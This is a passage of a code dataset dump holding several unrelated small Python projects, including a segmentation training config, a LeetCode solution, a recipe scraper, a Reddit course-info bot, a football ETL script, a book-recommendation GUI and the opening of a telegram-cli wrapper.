img_ratios\n            ],\n            [\n                dict(type='RandomFlip', prob=0., direction='horizontal'),\n                dict(type='RandomFlip', prob=1., direction='horizontal')\n            ], [dict(type='LoadAnnotations')], [dict(type='PackSegInputs')]\n        ])\n]\ntrain_dataloader = dict(\n    batch_size=8,\n    num_workers=4,\n    persistent_workers=True,\n    sampler=dict(type='InfiniteSampler', shuffle=True),\n    dataset=dict(\n        type=dataset_type,\n        data_root=data_root,\n        data_prefix=dict(\n            
img_path='img_dir/train', seg_map_path='ann_dir/train'),\n        pipeline=train_pipeline))\nval_dataloader = dict(\n    batch_size=1,\n    num_workers=4,\n    persistent_workers=True,\n    sampler=dict(type='DefaultSampler', shuffle=False),\n    dataset=dict(\n        type=dataset_type,\n        data_root=data_root,\n        data_prefix=dict(\n            img_path='img_dir/val', seg_map_path='ann_dir/val'),\n        pipeline=test_pipeline))\ntest_dataloader = val_dataloader\n\nval_evaluator = dict(type='IoUMetric', iou_metrics=['mIoU'])\ntest_evaluator = val_evaluator\n\ndefault_scope = 'mmseg'\nenv_cfg = dict(\n    cudnn_benchmark=True,\n    mp_cfg=dict(mp_start_method='fork', opencv_num_threads=0),\n    dist_cfg=dict(backend='nccl'),\n)\nvis_backends = [dict(type='LocalVisBackend')]\nvisualizer = dict(\n    type='SegLocalVisualizer', vis_backends=vis_backends, name='visualizer')\nlog_processor = dict(by_epoch=False)\nlog_level = 'INFO'\nresume = False\n\ntta_model = dict(type='SegTTAModel')\n\n# optimizer\noptimizer = dict(type='SGD', lr=0.005, momentum=0.9, weight_decay=0.0005)\noptim_wrapper = dict(type='OptimWrapper', optimizer=optimizer, clip_grad=None)\n# learning policy\nparam_scheduler = [\n    dict(\n        type='PolyLR',\n        eta_min=1e-4,\n        power=0.9,\n        begin=0,\n        end=40000,\n        by_epoch=False)\n]\n\n# training schedule for 3k iterations\ntrain_cfg = dict(type='IterBasedTrainLoop', max_iters=3000, val_interval=400)\nval_cfg = dict(type='ValLoop')\ntest_cfg = dict(type='TestLoop')\ndefault_hooks = dict(\n    timer=dict(type='IterTimerHook'),\n    logger=dict(type='LoggerHook', interval=100, log_metric_by_epoch=False),\n    param_scheduler=dict(type='ParamSchedulerHook'),\n    checkpoint=dict(type='CheckpointHook', by_epoch=False, interval=400,max_keep_ckpts=5, save_best='auto'),\n    sampler_seed=dict(type='DistSamplerSeedHook'),\n    visualization=dict(type='SegVisualizationHook'))\n\nwork_dir = '/root/workspace/03MMSegmentation/mmsegmentation/work_dirs/pspnet_r50-d8_melon'","repo_name":"songty21110133/OpenMMLabCamp","sub_path":"task4/pspnet_r50-d8_melon.py","file_name":"pspnet_r50-d8_melon.py","file_ext":"py","file_size_in_byte":5474,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37517697586","text":"# import thread\nimport threading\nimport random\nimport time\n\ndef randoms(threadName, quantity, delay=0):\n    randoms = []\n    count = 0\n    while count < quantity:\n        time.sleep(delay)\n        count += 1\n        randoms.append(random.randint(1, 10))\n    return randoms\n\nexitFlag = 0\n\nclass myThread(threading.Thread):\n    def __init__(self, threadID, name):\n        threading.Thread.__init__(self)\n        self.threadID = threadID\n        self.name = name\n\n    def run(self):\n        # print(\"Starting \", self.name)\n        numbers = randoms(self.name, random.randint(1, 10))\n\n        for n in numbers:\n            moves.append(n)\n        # print(\"N\", numbers)\n        # print(\"Exiting \", self.name)\n\nthreads = []\nmoves = []\n# Create new threads\nfor i in range(10):\n    threads.append(myThread(i, \"Thread-{i}\".format(i=i)))\n\n# Start new Threads\nfor t in threads:\n    t.start()\n\n# Wait for all threads to finish before reading the shared list\nfor t in threads:\n    t.join()\n\nprint(\"Exiting Main Thread\")\nprint(moves)\n","repo_name":"FR98/ai-hoppers","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":924,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"28024066240","text":"from typing import List\nnums = [2,2,3,2]\n\nclass Solution:\n    def singleNumber(self, nums: List[int]) -> int:\n        dic={}\n        for i in range(len(nums)):\n            if nums[i] in dic:\n                dic[nums[i]]=dic[nums[i]]+1\n                
else:dic[nums[i]]=1\n for key in dic:\n if dic[key]==1:return key\nclass Solution1:\n def singleNumber(self, nums: List[int]) -> int:\n nums.sort()\n for i in range(len(nums)-1):\n if nums[i+1] != nums[i] and nums[i-1] !=nums[i]:return nums[i]\n return nums[-1]\n\nans=Solution1()\nprint(ans.singleNumber(nums))","repo_name":"chen-gan-ga/pythonProject","sub_path":"leet-code/剑指/004只出现一次的数.py","file_name":"004只出现一次的数.py","file_ext":"py","file_size_in_byte":608,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"4226634234","text":"import sqlite3\n\n\nconn = sqlite3.connect('Database.db')\nc = conn.cursor()\n\n# id INTEGER PRIMARY KEY, Wealth TEXT, Learning TEXT,Project TEXT, Description TEXT, Date TEXT\n# add income to U1015728318 table to before last column\n\nc.execute(\"ALTER TABLE U1015728318 ADD COLUMN Income TEXT\")\n# make the date last column\nc.execute(\"ALTER TABLE U1015728318 ADD COLUMN Date_new TEXT\")\n# copy the old date column to the new date column\nc.execute(\"UPDATE U1015728318 SET Date_new = Date\")\nc.execute(\"ALTER TABLE U1015728318 DROP COLUMN Date\")\nc.execute(\"ALTER TABLE U1015728318 RENAME COLUMN Date_new TO Date\")\n\n# make Income = 990\nc.execute(\"UPDATE U1015728318 SET Income = 990\")\n\n\nconn.commit()\nconn.close()\n\nprint(\"Database updated\")\n\n\n# # commit the changes\n# conn.commit()\n","repo_name":"enterFaisal/my9mbot","sub_path":"remakedatabase.py","file_name":"remakedatabase.py","file_ext":"py","file_size_in_byte":767,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70586021929","text":"from pathlib import Path\n\nfrom third_party.Botok.botok import Text, sentence_tokenizer, WordTokenizer\n\n\ndef sent_tok(raw):\n w = WordTokenizer()\n tokens = w.tokenize(raw, spaces_as_punct=True)\n return sentence_tokenizer(tokens)\n\n\ndef plaintext_sent_par(units, sep=\"\\n\") -> str:\n out = []\n for u in units:\n unit = \"\".join([word.text for word in u['tokens']]).strip()\n while out and unit and len(units) >= 2 and (unit[0] == \" \" or unit[0] == \"།\"):\n out[-1] += unit[0]\n if len(unit) >= 2:\n unit = unit[1:]\n else:\n unit = \"\"\n out.append(unit)\n return sep.join(out)\n\n\ninpath = Path(\"input/\")\ninfiles = list(inpath.rglob(\"*.txt\"))\nfor f in infiles:\n raw = f.read_text(encoding=\"utf-8\").replace(\" \", \" \").replace(\"​\", \" \").replace(\"། ། \", \"། །\")\n\n outpath = Path( \"output/sentences\") / f.parts[-2]\n outpath.mkdir(exist_ok=True)\n outfile = outpath / f.name\n if not outfile.is_file():\n print(outfile)\n t = Text(raw).custom_pipeline(\"basic_cleanup\", sent_tok, \"dummy\", plaintext_sent_par)\n print()\n outfile.write_text(t, encoding=\"utf-8\")\n","repo_name":"OpenPecha/nlp-dataset","sub_path":"sent_tok.py","file_name":"sent_tok.py","file_ext":"py","file_size_in_byte":1187,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"24732348172","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('pttime', '0011_auto_20151214_0851'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='location',\n name='default_destination',\n field=models.BooleanField(default=False),\n ),\n 
]\n","repo_name":"henrysingleton/timetomelbourne","sub_path":"pttime/migrations/0012_location_default_destination.py","file_name":"0012_location_default_destination.py","file_ext":"py","file_size_in_byte":417,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"41096726493","text":"from selenium import webdriver\nfrom selenium.webdriver.chrome.options import Options\nfrom selenium.webdriver.common.by import By\nfrom processrecipe import process_recipe\nimport random\n\nNUM_LINKS = 25 # Number of total links to crawl. Links will be obtained from each crawled page\nLINKS_PER_CRAWL = 2 # How many related links to store from each page\n\nprint(\"Warming up Selenium...\")\n# Set up Chrome driver\nchrome_options = Options()\nchrome_options.add_argument(\"--headless\") # Run Chrome in headless mode\ndriver = webdriver.Chrome(executable_path='/path/to/chromedriver', options=chrome_options)\n\n# Navigate to the home page\nurl = 'https://realfood.tesco.com/'\nprint(f\"Accessing \\\"{url}\\\"...\")\ndriver.get(url)\n\nprint(\"Searching for promo links...\")\nlinks = []\n\nrecipes = [x.get_attribute(\"href\") for x in driver.find_elements(By.CLASS_NAME, \"hp-grid-carousel__link\")]\n\nrecipes2 = [x for x in recipes if x.startswith(url + \"recipes/\")]\n\nlinks.append(random.choice(recipes2))\n\nprint(\"Links found!\")\n\nrecipeInfo = []\n\ni = 0\nfailed_parses = 0\nwhile i < len(links):\n\tprint(f\"Processing recipe {i+1}/{NUM_LINKS + failed_parses}...\")\n\ttry:\n\t\trecipe = process_recipe(driver, links[i])\n\texcept:\n\t\ti += 1\n\t\tfailed_parses += 1\n\t\tcontinue\n\tif recipe[\"title\"] != \"Error\":\n\t\trecipeInfo.append(recipe)\n\t\tif len(recipeInfo) >= NUM_LINKS:\n\t\t\tbreak\n\telse:\n\t\tprint(\"Recipe not found\")\n\n\tls = list(recipe[\"promo_links\"])\n\tj = 0\n\twhile j < LINKS_PER_CRAWL:\n\t\trandoms = random.choice(ls)\n\t\tlinks.append(randoms)\n\t\tls.remove(randoms)\n\t\tj += 1\n\n\ti += 1\n\nTABLE_NAME = \"Recipes\" # Table to write values to\nSTARTING_ID = 25 # ID to start the RecipeID column at, this needs to be set correcly before and after every use\n\nwith open(\"recipes.sql\", \"w\") as file:\n\tfor recipe in recipeInfo:\n\t\tfile.write(\"INSERT INTO `{}` VALUES (\\\"{}\\\", \\\"{}\\\", \\\"{}\\\", \\\"{}\\\", \\\"{}\\\", \\\"{}\\\", \\\"{}\\\", \\\"{}\\\");\\n\".format(TABLE_NAME, STARTING_ID, recipe[\"title\"], recipe[\"description\"], recipe[\"serving\"], recipe[\"time\"], recipe[\"calories\"], \"%%%\".join(recipe[\"ingredients\"]), \"%%%\".join(recipe[\"method\"]).strip(\"\\n\")))\n\t\tSTARTING_ID += 1\n\n# Close Chrome driver\ndriver.quit()\n\nprint(\"STARTING_ID Incremented to \" + str(STARTING_ID))\n\n\n","repo_name":"Samuels-Account/Recipe-Search-Scraping-Alogorithm","sub_path":"screenscraping.py","file_name":"screenscraping.py","file_ext":"py","file_size_in_byte":2186,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6198417744","text":"import praw\nimport time\nfrom bs4 import BeautifulSoup\nimport requests\n\ndef run_bot(reddit):\n \n sub = reddit.subreddit(\"umanitoba\").new(limit = 20) #get the latest posts on the subreddit\n\n for post in sub: #looping through all the latest posts \n if (\"!find\" in post.selftext) and (not post.saved): # checking if the bot is called in that post and if the bot hasn't already replied \n reply_post(post)\n\n post.comments.replace_more(limit=None)\n for comment in post.comments.list(): #looping through all the 
comments (even replies to other comments)\n            if (\"!find\" in comment.body) and (not comment.saved):\n                reply_comment(comment)\n\n    \n# not using sub.stream.comments() or sub.stream.submissions() as that will be much more complicated to check for both new comments and posts continuously\n# so it is best to do it manually and have the bot run once every few minutes, since the subreddit itself isn't very active\n\n\ndef reply_comment(comment):\n    bot_request = comment.body.upper().split(\"!FIND\", 2)[1].strip() #get only the 2 words after !find which represent the course name & code\n    request = bot_request.split(\" \") #separate the course name and code \n    course_name = request[0].strip() \n    course_code = request[1].strip()\n    bot_reply = get_info(course_name, course_code)\n    comment.reply(bot_reply + \"\\n\\n**BEEP BOP. I'm a bot. You can contact my creator [here](https://www.reddit.com/message/compose?to=CanadianSorryPanda&subject=&message=)**\")\n    comment.save() # save the comment so the bot doesn't reply to it multiple times\n    print(\"Replied to a comment\")\n    \ndef reply_post(post):\n    bot_request = post.selftext.upper().split(\"!FIND\", 2)[1].strip()\n    request = bot_request.split(\" \")\n    course_name = request[0].strip()\n    course_code = request[1].strip()\n    bot_reply = get_info(course_name, course_code)\n    post.reply(bot_reply + \"\\n\\n**BEEP BOP. I'm a bot. You can contact my creator [here](https://www.reddit.com/message/compose?to=CanadianSorryPanda&subject=&message=)**\")\n    post.save()\n    print(\"Replied to a post\")\n    \n    \ndef login_bot(): \n    \n    reddit = praw.Reddit(client_id = \"\", \n                         client_secret = \"\",\n                         password = \"\",\n                         user_agent = \"\",\n                         username = \"\")\n    return reddit\n\n\ndef get_info(course_name, course_code):\n    \n    url = \"http://crscalprod.ad.umanitoba.ca/Catalog/ViewCatalog.aspx?pageid=viewcatalog&topicgroupid=27309&entitytype=CID&entitycode=\" + course_name + \"+\" + course_code #get the database for the course name\n    req = requests.get(url)\n    soup = BeautifulSoup(req.content, 'html.parser')\n    \n    text_td = soup.find_all(\"td\", class_ = \"courseValueCell\") # get course information from the webpage and save the name, description etc. 
as a list\n    \n    if not text_td: # if empty, this means the course name doesn't exist \n        return \"Sorry, I couldn't find the course you were looking for :(\"\n    \n    else:\n        name = \"*Course name:* \" + text_td[2].text \n        faculty = \"*Faculty:* \" + text_td[4].text\n        credit_hours = \"*Credit hours:* \" + text_td[1].text\n        description = \"*Description:* \" + text_td[3].text\n        \n        return (name + \"\\n\\n\" + faculty + \"\\n\\n\" + credit_hours + \"\\n\\n\" + description)\n    \n\ndef main(): \n    \n    reddit = login_bot()\n    \n    while True: \n        try:\n            run_bot(reddit)\n            print(\"Sleeping\")\n            time.sleep(120) # bot checks for new posts or comments once every 2 minutes\n        except praw.exceptions.PRAWException as e:\n            print(\"PRAW error: \" + str(e))\n            print(\"Waiting\")\n            time.sleep(600) # rest for 10 minutes if PRAW related error, longer wait-time is fine as the subreddit is not very active\n        except Exception as e:\n            print(\"Error: \" + str(e))\n            break \n            # if a non-PRAW error occurs then stop the program, if you want to run the bot indefinitely simply replace this line with time.sleep()\n    \n\n\nif __name__ == \"__main__\": # run the bot when executed directly as a py file\n    main()\n    \n    \n","repo_name":"ArshSB/uManitoba-course-finder-reddit-bot","sub_path":"course_info_bot.py","file_name":"course_info_bot.py","file_ext":"py","file_size_in_byte":4236,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19712797447","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon May 27 10:08:26 2019\n\n@author: mazaror\nSecond part of the ETL\n\"\"\"\n\nimport numpy as np\nimport pandas as pd\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.svm import SVC\nfrom sklearn.linear_model import ElasticNet\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.preprocessing import MinMaxScaler\n\nimport matplotlib.pyplot as plt\n\n#Import base created in ETL_1\ntablon = pd.read_pickle('C:/Users/mazaror/Documents/Respaldo Maro Zaror/Personal/Python/Proyectos/Futbol/base_v1.pkl')\ntablon = tablon[tablon['cant_jgos_h'] > 3]\ntablon.isnull().any()\ntablon[tablon['XXX'].isnull() == True].iloc[:10,:]\n\n#Add more advanced variables\ntablon['dif_ptos_x_part'] = tablon['ptos_loc_tot']/tablon['cant_jgos_h'] - tablon['ptos_vis_tot']/tablon['cant_jgos_a']\ntablon['dif_rend'] = tablon['ptos_loc_tot']/(tablon['cant_jgos_h']*3) - tablon['ptos_vis_tot']/(tablon['cant_jgos_a']*3)\ntablon['dif_locloc_visvis'] = tablon['ptos_loc_loc'] - tablon['ptos_vis_vis']\ntablon['dif_gol'] = tablon['dif_gol_loc'] - tablon['dif_gol_vis']\ntablon['difgol_locloc_visvis'] = tablon['dif_gol_loc_loc'] - tablon['dif_gol_vis_vis']\ntablon['dif_ptos_ls'] = tablon['ptos_h_last_season'] - tablon['ptos_a_last_season']\ntablon['dif_bal_cant'] = tablon['balance_cant_h'] - tablon['balance_cant_a']\ntablon['rat_bal'] = tablon['balance_h']/(tablon['balance_a'] + 1)\ntablon['rat_inv_x_jug'] = tablon['gasto_x_jug_h']/(tablon['gasto_x_jug_a'] + 1)\ntablon['rat_bal_2ls'] = tablon['balance_2ls_h']/(tablon['balance_2ls_a'] + 1)\ntablon['rat_inv_2ls'] = tablon['inv_2ls_h']/(tablon['inv_2ls_a'] + 1)\ntablon['dif_rend_ult5'] = tablon['rend_ult5_h'] - tablon['rend_ult5_a']\ntablon['rat_inv'] = tablon['inv_ls_h']/(tablon['inv_ls_a'] + 1)\n#tablon['rat_bal_ls'] = tablon['balance_ls_h']/(tablon['balance_ls_a'] + 1)\n\n\n#Select 
only the columns that show discriminative power\ntablon = tablon[['Season','HomeTeam','AwayTeam','FTR',\n                 'dif_ptos_x_part','dif_rend','dif_locloc_visvis','dif_gol',\n                 'difgol_locloc_visvis','ult_res', 'gan_ult3_h','dif_rend_ult5',\n                 'dif_ptos_ls','dif_bal_cant','rat_bal','rat_bal_2ls','rat_inv_x_jug',\n                 'rat_inv_2ls','rat_inv','pbb_loc','pbb_draw','pbb_vis']]\n\ncolumns= ['FTR','dif_ptos_x_part','dif_rend','dif_locloc_visvis','dif_gol',\n          'difgol_locloc_visvis','ult_res', 'gan_ult3_h','dif_rend_ult5',\n          'dif_ptos_ls','dif_bal_cant','rat_bal','rat_bal_2ls','rat_inv_x_jug',\n          'rat_inv_2ls','rat_inv','pbb_loc','pbb_draw','pbb_vis']\ntablon2 = tablon[columns]\n\n# A couple of extra analyses of the database\ntablon2.info()\ntablon2.groupby(by='FTR').mean()\ntablon2['FTR'].value_counts() #H 2.713 - A 1.627 - D 1.440\ncols = ['FTR','dif_bal_cant','rat_bal','rat_bal_2ls','rat_inv_x_jug','rat_inv']\ncols_elim = ['dif_bal_cant','rat_bal','rat_bal_2ls','rat_inv_x_jug','rat_inv']\n\ntab_test = tablon[cols]\ntab_test.boxplot('rat_bal', by= 'FTR')\ntab_test.hist('rat_bal', by= 'FTR', bins=20)\ntab_test.describe()\n#tab_test = tab_test.drop('std_dif_bal_cant',axis=1) # leftover from an interactive session: this column is never created\nscaler = StandardScaler()\nscaler.fit(tab_test['rat_inv_x_jug'].values.reshape(-1,1))\ntab_test['std_rat_inv_x_jug'] = scaler.transform(tab_test['rat_inv_x_jug'].values.reshape(-1,1))\n\ntab_test2 = tab_test[(tab_test['std_rat_inv_x_jug'] > -2) & (tab_test['std_rat_inv_x_jug'] < 2)]\ntab_test.groupby('FTR').mean()\n\n\ntablon = tablon.drop(cols_elim, axis=1)\n \ntablon.describe()\ntablon.groupby('FTR').mean()\n\ntablon2.to_pickle('C:/Users/mazaror/Documents/Respaldo Maro Zaror/Personal/Python/Proyectos/Futbol/base_v2.pkl')","repo_name":"MarcoZaror/predict_soccer_results","sub_path":"ETL_2.py","file_name":"ETL_2.py","file_ext":"py","file_size_in_byte":3728,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"29290370356","text":"import matplotlib.pyplot as plt\nimport numpy as np\n\ndef bar_charts(bar_6, bar_5, bar_4, x_label, y_label):\n\n    # Numbers of pairs of bars you want\n    N = 6\n\n    # Data on X-axis\n\n    ind = np.arange(N)\n\n    plt.figure()\n\n    # Width of a bar \n    width = 0.1 \n\n    # Plotting\n    plt.bar(ind, bar_6 + bar_5 + bar_4 , width, edgecolor='k', label='4-segments')\n    \n    plt.bar(ind + width, bar_5 + bar_6, width, edgecolor='k', label='5-segments')\n    plt.bar(ind + width + width, bar_6 , width, edgecolor='k', label='6-segments') \n    #plt.bar(ind + width + width + width, bar_4, width, label='4-segments')\n\n    plt.xlabel('Luminosity (nA)')\n    plt.ylabel('Tracks reconstructed (%)')\n\n    # First argument - A list of positions at which ticks should be placed\n    # Second argument - A list of labels to place at the given locations\n    plt.xticks(ind + width + width / 2 , ('45', '50', '55', '90', '100', '110'))\n    plt.yticks(np.arange(0, 1.1, 0.10))\n    plt.ylim([0,1])\n\n    # Position legend\n    plt.legend(bbox_to_anchor=(0, 1, 1, 0), loc=\"lower left\", mode=\"expand\", ncol=4)\n    plt.tight_layout()\n    # plt.savefig(filename)\n\n\n\nmodels = [] \nall_hits = []\nall_hits_err = []\nall_init_noise = []\nall_rec_noise = []\nall_rec_noise_err = []\nall_rec_6 = []\nall_rec_5 = []\nall_rec_4 = []\nfor p in [\"45\", \"50\", \"55\", \"90\",\"100\",\"110\"]:\n    models.append(p)\n    curr_dir = p+\"/testing_report.txt\" \n    line = 0\n    with open(curr_dir, 'r') as file:\n        for line in file:\n            if \"Reconstructed from 6 superlayers(%):\" in line:\n                all_rec_6.append( float(line.split(\": \")[1])/100)\n            elif \"Reconstructed from 5 
superlayers(%):\" in line:\n all_rec_5.append( float(line.split(\": \")[1])/100)\n elif \"Reconstructed from 4 superlayers(%):\" in line:\n all_rec_4.append( float(line.split(\": \")[1])/100)\nbar_charts(np.array(all_rec_6), np.array(all_rec_5), np.array(all_rec_4), None, None)\n# plt.show()\nplt.savefig('../segments_reconstruction.png')\nplt.figure()","repo_name":"gavalian/clas12ai","sub_path":"path_denoise_2d/experiments/luminosity_studies/plot_segments.py","file_name":"plot_segments.py","file_ext":"py","file_size_in_byte":2037,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"38760300048","text":"\"\"\"\nProject 3: Book Recommendations GUI\nStudent: Tri Trang\nI declare that the following source code was written solely by me.\nI understand that copying any source code, in whole or in part, constitutes\ncheating, and that I will receive a zero on this project if I am found in violation of this policy.\n\"\"\"\nfrom breezypythongui import EasyFrame\nfrom bookrecs import *\n\n\nclass BookRecs(EasyFrame):\n def __init__(self):\n super().__init__(title=\"Book Recommendation\", width=300, height=100, background=\"#B0E0E6\", resizable=True)\n self.name = \"\"\n self.report = \"\"\n self.btn_find_friend = self.addButton(text=\"Friend\", row=0, column=0, command=self.get_person)\n self.btn_recommend = self.addButton(text=\"Recommend\", row=0, column=1, command=self.get_recommendation)\n self.btn_get_report = self.addButton(text=\"Report\", row=0, column=2, command=self.get_all_recommendations)\n\n def get_person(self):\n self.name = self.prompterBox(title=\"Friend\", promptString=\"Enter Reader Name: \").lower()\n if self.name in readers:\n friends = get_two_friends(self.name)\n name_friends = \"\\n\".join([friend[0].title() for friend in friends])\n\n self.messageBox(title=f\"Friends of {self.name.title()}\", message=f\"{name_friends}\", width=50, height=10)\n else:\n self.messageBox(title=\"Error\", message=\"No such reader.\")\n\n def get_recommendation(self):\n self.name = self.prompterBox(title=\"Friend\", promptString=\"Enter Reader Name: \").lower()\n if self.name in readers:\n recommended_books = recommend(self.name, reader_ratings)\n books = \"\\n\".join([book[0] + \", \" + book[1] for book in recommended_books])\n self.messageBox(title=f\"Recommendations for {self.name.title()}\", message=f\"{books}\", width=50, height=10)\n else:\n self.messageBox(title=\"Error\", message=\"No such reader.\")\n\n def get_all_recommendations(self):\n for person in readers:\n friends = get_two_friends(person)\n recommended_books = recommend(person, reader_ratings)\n books = \"\\n \".join([book[0] + \", \" + book[1] for book in recommended_books])\n self.report += f\"\"\"Recommendations for {person.title()} from {friends[0][0].title()} and {friends[1][0].title()}:\n {books}\n \n\"\"\"\n self.messageBox(title=\"Report\", message=f\"{self.report}\", width=100, height=70)\n\n\ndef main():\n BookRecs().mainloop()\n\n\nif __name__ == '__main__':\n main()\n\n","repo_name":"tritrang/FirstRepo","sub_path":"Projects/Project 3/GUIBookRecs.py","file_name":"GUIBookRecs.py","file_ext":"py","file_size_in_byte":2533,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20052563344","text":"'''A sentence is a list of words that are separated by a single space with no leading or trailing spaces. 
Each word consists of lowercase and uppercase English letters.\n\nA sentence can be shuffled by appending the 1-indexed word position to each word then rearranging the words in the sentence.\n\nFor example, the sentence \"This is a sentence\" can be shuffled as \"sentence4 a3 is2 This1\" or \"is2 sentence4 This1 a3\".\nGiven a shuffled sentence s containing no more than 9 words, reconstruct and return the original sentence.\n\nExample 1:\n\nInput: s = \"is2 sentence4 This1 a3\"\nOutput: \"This is a sentence\"\nExplanation: Sort the words in s to their original positions \"This1 is2 a3 sentence4\", then remove the numbers.'''\n\n# TC = O(N)\n\n\ndef sortSentence(self, s: str) -> str:\n words = s.split()\n n = len(words)\n\n sent = [None] * n\n\n for i in range(n):\n sent[int(words[i][-1]) - 1] = words[i][:-1]\n\n return \" \".join(sent)\n\n\ndef sortSentence(self, s: str) -> str:\n\n dic = {}\n for i in s.split():\n dic[i[-1]] = i[:-1]\n\n final = []\n for num, word in sorted(dic.items()):\n final.append(word)\n return \" \".join(final)\n\n# (runtime / memory)\n# 24 ms / 14.3 MB\n\n\ndef sortSentence(self, s: str) -> str:\n\n dic = {}\n for i in s.split():\n dic[i[-1]] = i[:-1]\n\n final = [word for num, word in sorted(dic.items())]\n return \" \".join(final)\n\n# (runtime / memory)\n# 28 ms / 14.4 MB\n\n\ndef sortSentence(self, s: str) -> str:\n\n words = s[::-1].split()\n result = [word[1:][::-1] for word in sorted(words)]\n return ' '.join(result)\n\n# (runtime / memory)\n# 32 ms / 14.1 MB\n","repo_name":"DEVHrishi/DSA--PYTHON--SQL","sub_path":"String/Easy/Sorting the Sentence.py","file_name":"Sorting the Sentence.py","file_ext":"py","file_size_in_byte":1624,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35819707716","text":"from flask import *\nfrom api.db import *\nfrom random import sample\n\nrouter_page_nav = Blueprint(\"router_page_nav\", __name__, template_folder=\"templates\")\n\n@router_page_nav.route(\"/api/nav\")\ndef navData():\n data = openJson(\"activity\")\n data_list = []\n for i in range(0,len(data)):\n activityName = data[i][\"ActivityName\"]\n city = data[i][\"City\"]\n result = city+\":\"+activityName\n data_list.append(result)\n\n random_data=sample(data_list, 30)\n\n return random_data\n","repo_name":"Ben10225/lets_travel_group5","sub_path":"api/nav.py","file_name":"nav.py","file_ext":"py","file_size_in_byte":476,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8544062707","text":"import requests\r\n\r\n\r\n\r\ndef roulette():\r\n result = {\"빨노\" : \"\", \"언오\" : \"\", \"홀짝\" : \"\", \"회차\" : \"\"}\r\n response = requests.get('https://bepick.net/live/result/y_roulette?', headers={'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36'})\r\n req = response.json()\r\n\r\n result[\"회차\"] = req['round']\r\n\r\n if req['fd1'] == \"1\":\r\n result[\"빨노\"] = \"빨\"\r\n if req['fd1'] == \"2\":\r\n result[\"빨노\"] = \"노\"\r\n\r\n if req['fd2'] == \"1\":\r\n result[\"언오\"] = \"언\"\r\n if req['fd2'] == \"2\":\r\n result[\"언오\"] = \"오\"\r\n\r\n if req['fd3'] == \"1\":\r\n result[\"홀짝\"] = \"홀\"\r\n if req['fd3'] == \"2\":\r\n result[\"홀짝\"] = \"짝\"\r\n\r\n return result\r\n\r\n\r\ndef roulette_time():\r\n req = requests.get('https://bepick.net/json/game/y_roulette.json?', headers={'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) 
Chrome/111.0.0.0 Safari/537.36'})\r\n return req.json()['time_set']['nextTime'] + 1\r\n\r\n\r\n","repo_name":"simon9428x/Discord-Casino-Gaming-Bot","sub_path":"util/roulette.py","file_name":"roulette.py","file_ext":"py","file_size_in_byte":1081,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"22880756716","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport os\nimport time\nimport json\nimport socket\nimport shutil\nimport signal\nimport logging\nimport tempfile\nimport threading\nimport subprocess\n\n'''\ntgcli.py - Library to interact with telegram-cli.\nCopyright (C) 2015-2016 Dingyuan Wang\n\nThis program is free software: you can redistribute it and/or modify\nit under the terms of the GNU Lesser General Public License as\npublished by the Free Software Foundation, either version 3 of the\nLicense, or (at your option) any later version.\n\nThis program is distributed in the hope that it will be useful,\nbut WITHOUT ANY WARRANTY; without even the implied warranty of\nMERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\nGNU Lesser General Public License for more details.\n\nYou should have received a copy of the GNU Lesser General Public\nLicense along with this program. If not, see\n.\n'''\n\ntg_server_pub = '''-----BEGIN RSA PUBLIC KEY-----\nMIIBCgKCAQEAwVACPi9w23mF3tBkdZz+zwrzKOaaQdr01vAbU4E1pvkfj4sqDsm6\nlyDONS789sVoD/xCS9Y0hkkC3gtL1tSfTlgCMOOul9lcixlEKzwKENj1Yz/s7daS\nan9tqw3bfUV/nqgbhGX81v/+7RFAEd+RwFnK7a+XYl9sluzHRyVVaTTveB2GazTw\nEfzk2DWgkBluml8OREmvfraX3bkHZJTKX4EQSjBbbdJ2ZXIsRrYOXfaA+xayEGB+\n8hdlLmAjbCVfaigxX0CDqWeR1yFL9kwd9P0NsZRPsmoqVwMbMu7mStFai6aIhc3n\nSlv8kg9qv1m6XHVQY3PnEw+QQtqSIXklHwIDAQAB\n-----END RSA PUBLIC KEY-----\n'''\n\nlogger = logging.getLogger('tgcli')\nlogger.setLevel(logging.INFO)\ndo_nothing = lambda *args, **kwargs: None\n\ndef preexec_ignore_sigint():\n '''\n Ignore the SIGINT signal by setting the handler to the standard\n signal handler 